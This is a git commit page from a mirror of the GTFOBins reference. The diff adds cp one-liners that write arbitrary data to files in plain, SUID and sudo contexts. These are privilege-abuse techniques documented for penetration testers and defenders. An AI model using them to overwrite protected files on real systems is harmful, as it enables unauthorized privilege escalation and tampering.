1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-05 23:26:06 +02:00

Add cp file-write

Along the lines of #122.
This commit is contained in:
Andrea Cardaci 2020-03-21 19:24:30 +01:00
parent 834cae88be
commit 2e55528e82

View File

@ -4,7 +4,14 @@ functions:
- code: |
LFILE=file_to_read
cp "$LFILE" /dev/stdout
file-write:
- code: |
LFILE=file_to_write
echo "DATA" | cp /dev/stdin "$LFILE"
suid:
- code: |
LFILE=file_to_write
echo "DATA" | ./cp /dev/stdin "$LFILE"
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
code: |
LFILE=file_to_write
@ -12,6 +19,9 @@ functions:
echo "DATA" > $TF
./cp $TF $LFILE
sudo:
- code: |
LFILE=file_to_write
echo "DATA" | sudo cp /dev/stdin "$LFILE"
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
code: |
LFILE=file_to_write